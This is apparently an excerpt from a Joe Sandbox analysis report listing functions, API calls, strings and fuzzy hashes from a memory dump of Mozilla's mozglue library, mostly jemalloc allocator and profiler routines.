Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
API String ID: 487479824-2878602165
Opcode ID: b597d72641a96554e3f53d0522dfdd62da4833a1ef4f80e3dd3b0c196287cd00
Instruction ID: 5e06449eb7bac8b114ada78aea9c75b612b7234d7ae38690f2f207143a97b9d0
Opcode Fuzzy Hash: b597d72641a96554e3f53d0522dfdd62da4833a1ef4f80e3dd3b0c196287cd00
Instruction Fuzzy Hash: C6F1F470901319DFDB20DF29CC88B9AB7B4AF45308F0586D9D809A3641DB31BE86CF99

Function 6C62C4A0 Relevance: 35.2, APIs: 26, Instructions: 2665COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C62C5F9
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C62C6FB
memset.VCRUNTIME140(?,00000000,00004008), ref: 6C62C74D
memset.VCRUNTIME140(?,00000000,00004008), ref: 6C62C7DE
memset.VCRUNTIME140(?,00000000,00004014), ref: 6C62C9D5
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C62CC76
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C62CD7A
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C62DB40
memcpy.VCRUNTIME140(?,?,?), ref: 6C62DB62
memcpy.VCRUNTIME140(?,?,?), ref: 6C62DB99
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C62DD8B
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C62DE95
memcpy.VCRUNTIME140(?,?,?), ref: 6C62E360
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C62E432
memcpy.VCRUNTIME140(?,?,?), ref: 6C62E472

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
Instruction ID: 32bc0c6c7207c984a18dbeaf53193d54d342c16f9586cf0e023ab3e5caedc6b0
Opcode Fuzzy Hash: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
Instruction Fuzzy Hash: D633AC71E0021A8FCB04CFA8C8806EDBBF2FF89314F288269D955AB755D735A945CF94

Function 6C5EED10 Relevance: 32.4, APIs: 16, Strings: 2, Instructions: 5407COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6C5EEE7A
memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C5EEFB5
memcpy.VCRUNTIME140(?,?,?,?), ref: 6C5F1695
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C5F16B4
memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6C5F1770
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C5F1A3E

Strings

~q\l, xrefs: 6C5EED13
~q\l, xrefs: 6C5EED10

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: memset$freemallocmemcpy
String ID: ~q\l$~q\l
API String ID: 3693777188-2638852642
Opcode ID: 3cc87a37cd7a193acaab4526e952fed9f256914400799ca6ee6f0be2392d7afd
Instruction ID: aef2ffe2e6d0abbeedd87e4e4e735b9fc8aa7e4612fb3fc06bc874db4394af7c
Opcode Fuzzy Hash: 3cc87a37cd7a193acaab4526e952fed9f256914400799ca6ee6f0be2392d7afd
Instruction Fuzzy Hash: E3B31C71E04219CFDB18CFA8C890A9DB7B2FF89304F1586A9D459AB745D730AD86CF90

Function 6C5DFD00 Relevance: 31.4, APIs: 17, Strings: 3, Instructions: 1360memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C64E7B8), ref: 6C5DFF81
LeaveCriticalSection.KERNEL32(6C64E7B8), ref: 6C5E022D
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6C5E0240
EnterCriticalSection.KERNEL32(6C64E768), ref: 6C5E025B
LeaveCriticalSection.KERNEL32(6C64E768), ref: 6C5E027B

Strings

<jemalloc>, xrefs: 6C5E0D62, 6C5E0D76, 6C5E0DA7
MOZ_RELEASE_ASSERT(mNode), xrefs: 6C5DFE99, 6C5DFEB7, 6C5DFED3, 6C5E0DB8, 6C5E0DD3, 6C5E19B4
: (malloc) Error in VirtualFree(), xrefs: 6C5E0D67, 6C5E0D7B, 6C5E0DAC

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_RELEASE_ASSERT(mNode)
API String ID: 618468079-3577267516
Opcode ID: 3a080610397a407305025d0903155357b227ca4df3226c8a4d1fcaff63eac660
Instruction ID: 32530da7b225af5604c85f2100c66249ca5f5c44963a3a24052f4869eb3cf05b
Opcode Fuzzy Hash: 3a080610397a407305025d0903155357b227ca4df3226c8a4d1fcaff63eac660
Instruction Fuzzy Hash: 31C2BF71A057418FD714CF29C980716BBE1BFC9328F28CA6DE4A98B795DB71E801CB85

Function 6C603E50 Relevance: 28.8, APIs: 13, Strings: 3, Instructions: 765COMMON

Download Yara Rule

APIs

Part of subcall function 6C627770: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(}>`l,?,?,?,6C603E7D,?,?), ref: 6C62777C

tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 6C603F17
memset.VCRUNTIME140(?,00000000,00000110), ref: 6C603F5C
VerSetConditionMask.NTDLL ref: 6C603F8D
VerSetConditionMask.NTDLL ref: 6C603F99
VerSetConditionMask.NTDLL ref: 6C603FA0
VerSetConditionMask.NTDLL ref: 6C603FA7
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C603FB4

Strings

nvd3d9wrap.dll, xrefs: 6C604466
nvinit.dll, xrefs: 6C604479
C>`l, xrefs: 6C603E93

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersionmemsettolowerwcslen
String ID: C>`l$nvd3d9wrap.dll$nvinit.dll
API String ID: 1189858803-349542667
Opcode ID: 541f868a8b70582239c6af77b07a3b1e835edd2449de1c6b43b8b7887c8faf36
Instruction ID: 068ae00cceeaca843b9ab323e255f0b0dc0fb8002cfedaadcae4e2064b9bf1a8
Opcode Fuzzy Hash: 541f868a8b70582239c6af77b07a3b1e835edd2449de1c6b43b8b7887c8faf36
Instruction Fuzzy Hash: 0F52F071614B488FD714EF24C980ABB77EAEF85308F44492DE5968B782DB70F909CB64

Function 6C5DFEF0 Relevance: 23.8, APIs: 13, Strings: 2, Instructions: 1294memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C64E7B8), ref: 6C5DFF81
LeaveCriticalSection.KERNEL32(6C64E7B8), ref: 6C5E022D
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6C5E0240
EnterCriticalSection.KERNEL32(6C64E768), ref: 6C5E025B
LeaveCriticalSection.KERNEL32(6C64E768), ref: 6C5E027B

Strings

MOZ_CRASH(), xrefs: 6C5E0CA7
MOZ_RELEASE_ASSERT(mNode), xrefs: 6C5DFE99, 6C5DFEB7, 6C5DFED3, 6C5E0DB8, 6C5E0DD3, 6C5E19B4, 6C5E1A10

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocVirtual
String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(mNode)
API String ID: 618468079-3566792288
Opcode ID: 51abd7766c73c2d5c4cfdd4d295ec88ad8e6a6debea9b52cf942435df98f7d7c
Instruction ID: 70b37ed849cf8b5bee1d1391f068d6f668c5f400a0a326cf6b9bd46540b87e3a
Opcode Fuzzy Hash: 51abd7766c73c2d5c4cfdd4d295ec88ad8e6a6debea9b52cf942435df98f7d7c
Instruction Fuzzy Hash: 57B29E716057418FD718CF29C9D0716BBE1BF89328F28C66DE86A8B796D770E841CB41

Function 6C615600 Relevance: 22.0, APIs: 6, Strings: 6, Instructions: 950COMMON

Download Yara Rule

Strings

name, xrefs: 6C615E79, 6C615E8F
expected a Time entry, xrefs: 6C615CB6
schema, xrefs: 6C61606D
data, xrefs: 6C616131
expected a Count entry, xrefs: 6C615AC3
ProfileBuffer parse error: %s, xrefs: 6C615AC8, 6C615CBB

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID:
String ID: ProfileBuffer parse error: %s$data$expected a Count entry$expected a Time entry$name$schema
API String ID: 0-2712937348
Opcode ID: 00d215804a1da7348e01d92ba185a096ba189afb5a2421aa46470c6e9c611394
Instruction ID: df2f90f18238cd78d2e57bab6392c5b8e211eebd7df135a0c3f96c6ca79920bb
Opcode Fuzzy Hash: 00d215804a1da7348e01d92ba185a096ba189afb5a2421aa46470c6e9c611394
Instruction Fuzzy Hash: D1923A75A083418FD724CF28C49079AF7E1BFC9308F15891DE59A9BB51DB30E909CB96

Function 6C612E4E Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 579stringCOMMON

Download Yara Rule

APIs

MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C612ED3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C612EE7
MozFormatCodeAddressDetails.MOZGLUE(?,000000FF,00000000,?,?), ref: 6C612F0D
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C613214
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C613242
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6136BF

Strings

MOZ_PROFILER_SYMBOLICATE, xrefs: 6C61378D
set , xrefs: 6C6136EC
get , xrefs: 6C613205

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: strlen$AddressCode$DescribeDetailsFormat
String ID: MOZ_PROFILER_SYMBOLICATE$get $set
API String ID: 2257098003-3318126862
Opcode ID: a8b23596a1446396be8279e9b52272c9c3f4b7eb31e49fedcf88b7b90795c1a6
Instruction ID: 6c8e9273c4f71b56b7669b3d890999a13f2080b77501589a4821b66069836d05
Opcode Fuzzy Hash: a8b23596a1446396be8279e9b52272c9c3f4b7eb31e49fedcf88b7b90795c1a6
Instruction Fuzzy Hash: E332637060C3818FD324CF28C49069FB7E2AFC6319F54892DE59A87B51DB31D94ACB5A

Function 6C607E10 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 403COMMON

Download Yara Rule

Strings

name, xrefs: 6C607ECF, 6C608335
vdl, xrefs: 6C608207
schema, xrefs: 6C6081E3, 6C608311
(pre-xul), xrefs: 6C607E88
data, xrefs: 6C608280, 6C6083E1

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: memcpystrlen
String ID: (pre-xul)$data$name$schema$vdl
API String ID: 3412268980-2465630707
Opcode ID: 10d9f68704a3db128d8a86bd6e7fae7cbf305df61a470e67e8aa586e45197eff
Instruction ID: 9246e3c30cf84583784e806c2bbb80174be85a467bba1f67c6216165f1d43cff
Opcode Fuzzy Hash: 10d9f68704a3db128d8a86bd6e7fae7cbf305df61a470e67e8aa586e45197eff
Instruction Fuzzy Hash: 8EE170B1B043508BC714CF68884065BF7EABFD9314F15892DE899E7790DBB0ED098B96

Function 6C5E5E90 Relevance: 19.2, APIs: 5, Strings: 6, Instructions: 2651COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(-0000000C), ref: 6C5E5EDB
memset.VCRUNTIME140(ewbl,000000E5,?), ref: 6C5E5F27
LeaveCriticalSection.KERNEL32(?), ref: 6C5E5FB2
memset.VCRUNTIME140(ewbl,000000E5,?), ref: 6C5E61F0
VirtualFree.KERNEL32(-00000001,00100000,00004000), ref: 6C5E7652

Strings

MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6C5E72E3
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6C5E72F8
MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6C5E730D
MOZ_CRASH(), xrefs: 6C5E7BA4
ewbl, xrefs: 6C5E5E9C, 6C5E5F22, 6C5E61ED
MOZ_RELEASE_ASSERT(mNode), xrefs: 6C5E7BCD, 6C5E7C1F, 6C5E7C34, 6C5E80FD

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: CriticalSectionmemset$EnterFreeLeaveVirtual
String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)$ewbl
API String ID: 2613674957-4059062753
Opcode ID: 2947d7486878cc69c5fbc25b615bfa38b1cf8d4833a3d6e40ec31de8b5b6a649
Instruction ID: 63d501401ef14b95a12d91cb0f78fec87c48bd87705412b38205e00a5e907d38
Opcode Fuzzy Hash: 2947d7486878cc69c5fbc25b615bfa38b1cf8d4833a3d6e40ec31de8b5b6a649
Instruction Fuzzy Hash: 3D336C716057018FD308CF29C990615BBE2BF89368F29C7ADE9698F7A6D731E841CB41

Function 6C5ED4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C64E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C5FD1C5), ref: 6C5ED4F2
LeaveCriticalSection.KERNEL32(6C64E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C5FD1C5), ref: 6C5ED50B

Part of subcall function 6C5CCFE0: EnterCriticalSection.KERNEL32(6C64E784), ref: 6C5CCFF6
Part of subcall function 6C5CCFE0: LeaveCriticalSection.KERNEL32(6C64E784), ref: 6C5CD026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C5FD1C5), ref: 6C5ED52E
EnterCriticalSection.KERNEL32(6C64E7DC), ref: 6C5ED690
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C5ED6A6
LeaveCriticalSection.KERNEL32(6C64E7DC), ref: 6C5ED712
LeaveCriticalSection.KERNEL32(6C64E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C5FD1C5), ref: 6C5ED751
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C5ED7EA

Strings

<jemalloc>, xrefs: 6C5ED827
: (malloc) Error initializing arena, xrefs: 6C5ED82C

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
String ID: : (malloc) Error initializing arena$<jemalloc>
API String ID: 2690322072-3894294050
Opcode ID: f585fdd7a503a94a5115572a92b7f4c4189ea8e8a2cecf3498b5c2e13ed2e34f
Instruction ID: bc35e40dba5c69a2e18889a69b92f486e11a6336a6dd67d67e250f73c367ca0d
Opcode Fuzzy Hash: f585fdd7a503a94a5115572a92b7f4c4189ea8e8a2cecf3498b5c2e13ed2e34f
Instruction Fuzzy Hash: 6691A371A047018FD714DF29C89076AB7E2EBC9318F15C92EE59AC7A81D730E845CB86

Function 6C624EA0 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 408sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0), ref: 6C624EFF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C624F2E
moz_xmalloc.MOZGLUE ref: 6C624F52
memset.VCRUNTIME140(00000000,00000000), ref: 6C624F62
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6252B2
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6252E6
Sleep.KERNEL32(00000010), ref: 6C625481
free.MOZGLUE(?), ref: 6C625498

Strings

(, xrefs: 6C625250

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: floor$Sleep$freememsetmoz_xmalloc
String ID: (
API String ID: 4104871533-3887548279
Opcode ID: f06e72f119bf78f6c265325d299cada9a18929326a7479db209f09b47ab699d7
Instruction ID: e0d15053732688a997b254a410e4ae68631333b67bfd511e3ffa6a5bbb491f25
Opcode Fuzzy Hash: f06e72f119bf78f6c265325d299cada9a18929326a7479db209f09b47ab699d7
Instruction Fuzzy Hash: DFF1B171A18B408FC716DF39C89062BB7F5AFD6384F05C72EF84AA7651DB3198428B85

Function 6C5E9E50 Relevance: 13.1, APIs: 6, Strings: 1, Instructions: 878COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C5E9EB8
LeaveCriticalSection.KERNEL32(?), ref: 6C5E9F24
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C5E9F34
LeaveCriticalSection.KERNEL32(?), ref: 6C5EA823
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C5EA83C
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C5EA849

Strings

MOZ_RELEASE_ASSERT(mNode), xrefs: 6C5EA8B1, 6C5EA8D4, 6C5EA8EF

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: CriticalSection$K@1@LeaveMaybe@_RandomUint64@mozilla@@$Entermemset
String ID: MOZ_RELEASE_ASSERT(mNode)
API String ID: 2950001534-1351931279
Opcode ID: f0d4fd467ba227a40f93ea2c0906b2bebe933cf27ac21a239fa50ef557e54041
Instruction ID: 2571e85fbb35e72c04452f6da452d208cbdd8e737d1d43edb2f1d2a01b9454b5
Opcode Fuzzy Hash: f0d4fd467ba227a40f93ea2c0906b2bebe933cf27ac21a239fa50ef557e54041
Instruction Fuzzy Hash: 0B726A72A056118FD718CF29C940615FFF1BF89328F29C6ADE8699B791D335E842CB80

Function 6C612C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON

Download Yara Rule

APIs

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C612C31
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C612C61

Part of subcall function 6C5C4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C5C4E5A
Part of subcall function 6C5C4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C5C4E97

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C612C82
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C612E2D

Part of subcall function 6C5D81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C5D81DE

Strings

(root), xrefs: 6C61354F
expected a Time entry, xrefs: 6C612E36
ProfileBuffer parse error: %s, xrefs: 6C612E3B

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
API String ID: 801438305-4149320968
Opcode ID: 7e2c683ac84060e410ac967c37e22c7346d5a6e405e6c22712da82db19b200dd
Instruction ID: ef2dcc30d764560abbf90830df5afec3147ae580a629a40c88572276322aab08
Opcode Fuzzy Hash: 7e2c683ac84060e410ac967c37e22c7346d5a6e405e6c22712da82db19b200dd
Instruction Fuzzy Hash: 0191A0B060C7418FD724DF28C48469EB7E1AFCA358F50892DE59A8BB50DB30D949CB5A

Function 6C629E30 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 347COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 6C629F3D
__aulldiv.LIBCMT ref: 6C629F77
__aullrem.LIBCMT ref: 6C629F8C
__aulldiv.LIBCMT ref: 6C62A023

Strings

NaN, xrefs: 6C629EAB
-Infinity, xrefs: 6C629E60, 6C629E7B

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: __aulldiv__aullrem
String ID: -Infinity$NaN
API String ID: 3839614884-2141177498
Opcode ID: 858b7335669777fbcddb25a8431ccfd8ac8cf1ed17db213ee85d151683458ff8
